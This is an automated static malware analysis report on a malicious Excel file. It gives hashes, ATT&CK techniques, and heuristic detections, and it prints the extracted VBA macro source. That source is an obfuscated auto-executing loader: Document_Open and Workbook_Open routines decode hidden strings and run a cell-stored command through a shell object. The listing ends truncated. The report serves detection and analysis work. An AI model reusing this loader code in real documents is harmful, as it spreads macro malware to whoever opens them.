Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 073e13fbc0d45bd2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 225.5 KB
Created: 2018-05-11 08:42:05
Authoring application: Microsoft Excel
First seen: 2019-12-10
MD5: 2c60319b97e62d40335b5766b7942317
SHA-1: 5832dc824c69ba0232f89532d20f63f871bc3cac
SHA-256: 073e13fbc0d45bd2353b67b0aff5f93f20ec48d794ed9d19c5b4403e08547f49
Risk score: 322

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

This Excel file contains heavily obfuscated VBA and XLM macros, including auto-executing Document_Open and Workbook_Open routines. The VBA code uses a custom decoder function to deobfuscate a string, which is then executed using Application.Run. This pattern strongly suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection name 'Xls.Malware.Valyria-6700358-0' further supports its malicious nature.

Heuristics (9)

  • ClamAV: Xls.Malware.Valyria-6700358-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 229 bytes
SHA-256: b07e9b3c0bc67a5abf1f3d5a279d12af20bcec7c89268c78faaa2dc946b3582d
Preview (first 1,000 lines of the extracted script):
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  MPro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7573 bytes
SHA-256: 0f26c34155dc7080a87de066c36d199b11a5524475f458cd0925e6b3cafbaa52
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 8 long base64-like blobs)
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function acJRK() As String
Dim aacJRK As String
aacJRK = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acJRK = aacJRKEnd Function

Public Function J_RE(ByVal KN_I As String)
   Dim MPN_LBQ As String
   Dim Z_V As Long
   For Z_V = 1 To Len(KN_I) Step 2
        MPN_LBQ = MPN_LBQ & Chr(CLng("&H" & Mid(KN_I, Z_V, 2)) - 18)
   Next
   J_RE = MPN_LBQ
End Function
Public Sub Document_Open()
    Application.Run J_RE("685B6C615B64566955715F5959")
End Sub
Private Function acA58() As String
Dim aacA58 As String
aacA58 = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acA58 = aacA58End Function

Sub Workbook_Open()
    Application.Run "ThisWorkbook." & J_RE("685B6C615B64566955715F5959")
End Sub
Private Function acIQV() As String
Dim aacIQV As String
aacIQV = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acIQV = aacIQVEnd Function

Public Sub O_KI()
    Dim KN_I As Object: Set KN_I = VBA.CreateObject(J_RE("696575847B828640657A777E7E"))
    KN_I.Exec (J_RE(ThisWorkbook.Sheets("MProp").Range("J225").Value))
End Sub
Private Function acXBP() As String
Dim aacXBP As String
aacXBP = "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
acXBP = aacXBPEnd Function

Sub VIZOIRDWC_MGG()
    O_KI
End Sub

' Processing file: /opt/analyzer/scan_staging/ac6866b60f57410f8f3118b901936ad4.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8298 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	FuncDefn (Private Function KN_I(id_FFFE As String) As String)
' Line #2:
' 	Dim 
' 	VarDefn MPN_LBQ (As String)
' Line #3:
' 	LitStr 0x018E "6C4040404040402B3C40400640404C4016404036402140522E40404025400B4040194024384040092221404060403A40642140754C40474040596940517C172F803940404040FE2E40406C40403180274C0539404059404042402640400A4069281667404340401F404D256738502B30134040014070403E407608404055401B1A5840406940636B1B401E79504077404080714066404444403740403367401E36405140175525404B5240404055405B404063557F404040402A4E4033404040056A1C62804040"
' 	St MPN_LBQ 
' Line #4:
' 	Reparse 0x001A "acJRK = aacJRKEnd Function"
' Line #5:
' Line #6:
' 	FuncDefn (Public Function Chr(ByVal Document_Open As String, id_FFFE As Variant))
' Line #7:
' 	Dim 
' 	VarDefn Application (As String)
' Line #8:
' 	Dim 
' 	VarDefn Run (As Long)
' Line #9:
' 	S
... (truncated)